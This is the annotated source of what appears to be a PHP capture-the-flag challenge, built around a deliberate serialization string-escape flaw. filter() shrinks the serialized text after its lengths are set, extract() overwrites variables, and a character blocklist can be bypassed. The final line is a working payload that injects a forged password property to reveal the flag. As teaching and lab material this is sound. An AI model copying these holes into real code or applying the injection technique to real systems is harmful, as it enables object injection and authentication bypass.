<?php
// Turn off all PHP error reporting for this request. Failures further down
// (for example unserialize() rejecting malformed input) then produce no
// diagnostics at all.
error_reporting(0);

// Print this file's own source, syntax-highlighted, into the response.
highlight_file(__FILE__);
/**
 * Credential holder whose deserialization hook performs the password check.
 *
 * Both properties are public, so serialize() writes them under their plain
 * names and unserialize() restores whatever values the serialized string
 * carries.
 */
class spaceman
{
    /** @var mixed First constructor argument, stored as given. */
    public $username;

    /** @var mixed Second constructor argument; the value __wakeup() compares. */
    public $password;

    /**
     * Store the two supplied values on the instance without any validation.
     *
     * @param mixed $username
     * @param mixed $password
     */
    public function __construct($username, $password)
    {
        $this->username = $username;
        $this->password = $password;
    }

    /**
     * Magic method PHP invokes right after unserialize() rebuilds the object.
     *
     * Echoes $flag from flag.php when the restored password is strictly equal
     * to 'ctfshowvip', otherwise echoes 'wrong password'. The comparison reads
     * the deserialized property only; nothing in this class verifies that the
     * serialized string is the one serialize() originally produced, so the
     * check is only as trustworthy as the integrity of that string.
     */
    public function __wakeup()
    {
        if ($this->password !== 'ctfshowvip') {
            echo 'wrong password';
            return;
        }

        // flag.php is included inside this method, so the $flag it is
        // expected to define lives in the method's local scope.
        include("flag.php");
        echo $flag;
    }
}
/**
 * Replace every occurrence of 'ctfshowup' in $string with 'ctfshow'.
 *
 * Each replacement makes the result two bytes shorter than the input.
 * NOTE(review): the only caller in this file passes serialize() output, and
 * the s:N: length prefixes inside that output are not recomputed after the
 * replacement. A serialized string whose declared lengths no longer match its
 * data is parsed differently from what was serialized. Any filtering belongs
 * on the values before serialize(), never on the serialized text.
 *
 * @param mixed $string Subject passed straight to str_replace().
 * @return mixed Result of str_replace().
 */
function filter($string)
{
    $needle = 'ctfshowup';
    $replacement = 'ctfshow';

    return str_replace($needle, $replacement, $string);
}
// Raw request body, read independently of PHP's own $_POST parsing.
$str = file_get_contents("php://input");

// Blocklist on the raw bytes: any '_', '.', ']' or '[' ends the request.
// NOTE(review): this inspects the body before PHP normalises parameter names,
// so it is not a check on the variable names extract() creates below. The
// sample request shown with this listing uses "user name" / "pass word".
if (preg_match('/\_|\.|\]|\[/is', $str)) {
    die("I am sorry but you have to leave.");
}

// extract() turns every POST key into a variable in the global scope, so the
// client chooses which variables exist from here on. Reading the expected
// keys explicitly from $_POST avoids that.
extract($_POST);

// $user_name and $pass_word exist only if the request supplied them; with
// error reporting off, missing ones silently become null.
// The object is serialized, the serialized text is altered by filter(), and
// the altered text is then deserialized, which runs spaceman::__wakeup() on
// data that is no longer guaranteed to describe the object built here.
// A format without embedded length prefixes (e.g. JSON), or an integrity
// check on the string before unserialize(), closes that gap.
$ser = filter(serialize(new spaceman($user_name, $pass_word)));
$test = unserialize($ser);
?>
user name=ctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowupctfshowup&pass word=1";s:8:"password";s:10:"ctfshowvip